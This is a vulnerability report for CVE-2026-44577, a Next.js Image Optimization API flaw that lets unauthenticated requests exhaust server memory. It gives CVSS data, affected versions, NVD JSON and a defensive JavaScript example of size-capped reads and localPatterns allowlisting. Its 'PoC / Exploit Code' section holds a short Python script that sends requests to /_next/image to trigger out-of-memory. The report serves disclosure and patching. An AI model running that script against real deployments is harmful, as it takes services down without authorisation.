Security Vulnerability Report
CVE-2026-44577 CVSS 5.9 MEDIUM

CVE-2026-44577

Published: 2026-05-13 17:16:23
Last Modified: 2026-05-13 20:01:00

Description

Next.js is a React framework for building full-stack web applications. In versions from 10.0.0 before 15.5.16, and from 16.0.0 before 16.2.5, when Next.js is self-hosted with the default image loader, the Image Optimization API reads local images entirely into memory without enforcing a maximum size. An unauthenticated attacker can cause out-of-memory conditions by requesting large local assets through the /_next/image endpoint, provided the asset path matches the images.localPatterns configuration (by default, all local paths are allowed). The issue is fixed in 15.5.16 and 16.2.5; NVD classifies the weakness as CWE-770 (Allocation of Resources Without Limits or Throttling).
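The following is an added example, not Next.js source code and not from the advisory: it shows the unbounded accumulation the description refers to beside a bounded replacement (a Content-Length pre-check plus a running byte count while reading, so a missing or false Content-Length cannot bypass the cap), and a simplified stand-in for the images.localPatterns check that decides which local paths reach the optimizer at all. The function names, the 8 MiB limit, the sample localPatterns config and the in-memory "stream" of chunks are all assumptions constructed for illustration.

```javascript
// Added example (not Next.js source code). Names, the 8 MiB cap, the sample
// config and the chunked sample body are assumptions made for illustration.

const MAX_IMAGE_BYTES = 8 * 1024 * 1024; // hypothetical cap; size it to your largest real asset

class ImageTooLargeError extends Error {
  constructor(bytes, limit) {
    super(`local image rejected: ${bytes} bytes exceeds limit of ${limit}`);
    this.name = 'ImageTooLargeError';
  }
}

// Vulnerable shape: every chunk of the body is kept until the stream ends,
// so memory use grows with the asset size and nothing stops it.
function readUnbounded(chunks) {
  const parts = [];
  for (const chunk of chunks) parts.push(chunk);
  return Buffer.concat(parts);
}

// Hardened shape: fail fast on a declared Content-Length over the limit,
// then keep a running total while reading so an absent or lying
// Content-Length cannot bypass the cap.
function readWithLimit(chunks, maxBytes = MAX_IMAGE_BYTES, contentLength) {
  if (contentLength !== undefined) {
    const declared = Number(contentLength);
    if (!Number.isNaN(declared) && declared > maxBytes) {
      throw new ImageTooLargeError(declared, maxBytes);
    }
  }
  const parts = [];
  let total = 0;
  for (const chunk of chunks) {
    total += chunk.length;
    if (total > maxBytes) throw new ImageTooLargeError(total, maxBytes); // stop before buffering more
    parts.push(chunk);
  }
  return Buffer.concat(parts);
}

// Minimal glob-to-RegExp for a localPatterns pathname: "**" spans directory
// boundaries, "*" stays inside one path segment. This is a simplified
// stand-in for the matcher Next.js uses; only these two wildcards are handled.
function globToRegExp(glob) {
  let re = '';
  for (let i = 0; i < glob.length; i++) {
    const ch = glob[i];
    if (ch === '*') {
      if (glob[i + 1] === '*') { re += '.*'; i++; } else { re += '[^/]*'; }
    } else {
      re += ch.replace(/[.+?^${}()|[\]\\]/g, '\\$&');
    }
  }
  return new RegExp(`^${re}$`);
}

// True when the requested local path may be fetched. With no localPatterns
// configured every local path is allowed, which is the default the advisory
// warns about. A pattern with search: '' also rejects any query string.
function isAllowedLocalImage(requestUrl, localPatterns) {
  if (!localPatterns) return true;
  const url = new URL(requestUrl, 'http://localhost');
  return localPatterns.some((pattern) => {
    if (pattern.search !== undefined && pattern.search !== url.search) return false;
    return globToRegExp(pattern.pathname ?? '**').test(url.pathname);
  });
}

// Constructed sample config in the shape of next.config.js images.localPatterns.
const SAMPLE_LOCAL_PATTERNS = [{ pathname: '/assets/images/**', search: '' }];

// Constructed sample body: four 256 KiB chunks (1 MiB total), standing in for a stream.
function sampleChunks(count = 4, size = 256 * 1024) {
  return Array.from({ length: count }, () => Buffer.alloc(size, 0xff));
}

// Demo: the same 1 MiB body passes a 2 MiB cap and is rejected by a 512 KiB cap.
console.log('unbounded read:', readUnbounded(sampleChunks()).length, 'bytes');
console.log('bounded read:', readWithLimit(sampleChunks(), 2 * 1024 * 1024).length, 'bytes');
try {
  readWithLimit(sampleChunks(), 512 * 1024);
} catch (e) {
  console.log('bounded read rejected:', e.message);
}
console.log('/assets/images/logo.png allowed:', isAllowedLocalImage('/assets/images/logo.png', SAMPLE_LOCAL_PATTERNS));
console.log('/uploads/huge.tiff allowed:', isAllowedLocalImage('/uploads/huge.tiff', SAMPLE_LOCAL_PATTERNS));
```

Two points worth checking in a real deployment: the byte cap has to be enforced during the read, not only on Content-Length, because the optimizer fetches the local asset from the app itself and that response may be chunked; and an explicit localPatterns allowlist in next.config.js (the shape of SAMPLE_LOCAL_PATTERNS above) limits what an attacker can even ask the optimizer to load, which is the mitigation the description points at, independent of upgrading.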

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE (Next.js from 10.0.0, before 15.5.16)
cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE (Next.js from 16.0.0, before 16.2.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_nextjs_dos(target_url, local_file_path, timeout=30):
    """
    Proof of Concept for CVE-2026-44577.
    Attempts to trigger OOM by requesting a large local asset via the
    Image Optimization API (/_next/image). For local images the url
    parameter is a path the app itself serves (for example a file under
    public/), not an arbitrary filesystem path, and it must match
    images.localPatterns (all local paths are allowed by default).
    """
    # w must be one of the server's configured deviceSizes/imageSizes and q one
    # of its allowed qualities, or the request is rejected before any fetch
    # happens; 640 and 75 are in the defaults. requests encodes the parameters.
    params = {"url": local_file_path, "w": 640, "q": 75}
    try:
        print(f"Sending request to: {target_url}/_next/image with {params}")
        response = requests.get(f"{target_url}/_next/image", params=params, timeout=timeout)
        print(f"Response Status: {response.status_code}")
        print("Check server memory usage and availability.")
    except requests.RequestException as e:
        # A timeout or dropped connection is itself a sign the server is struggling.
        print(f"Request failed: {e}")


# Example usage (large_file is a placeholder for a big asset the app serves)
# target = "http://localhost:3000"
# large_file = "/large-asset.bin"
# exploit_nextjs_dos(target, large_file)

References

https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh (Vendor Advisory, Mitigation)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44577", "sourceIdentifier": "[email protected]", "published": "2026-05-13T17:16:23.173", "lastModified": "2026-05-13T20:00:59.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. From 10.0.0 to before 15.5.16 and 16.2.5, when self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. An attacker could cause out-of-memory conditions by requesting large local assets from the /_next/image endpoint that match the images.localPatterns configuration (by default, all patterns are allowed). This vulnerability is fixed in 15.5.16 and 16.2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "15.5.16", "matchCriteriaId": "1285DDF1-644C-49F3-8418-2615C467B282"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "16.0.0", "versionEndExcluding": "16.2.5", "matchCriteriaId": "27C5CF7A-7A33-4BE4-B8FD-10BFD813204A"}]}]}], "references": [{"url": "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}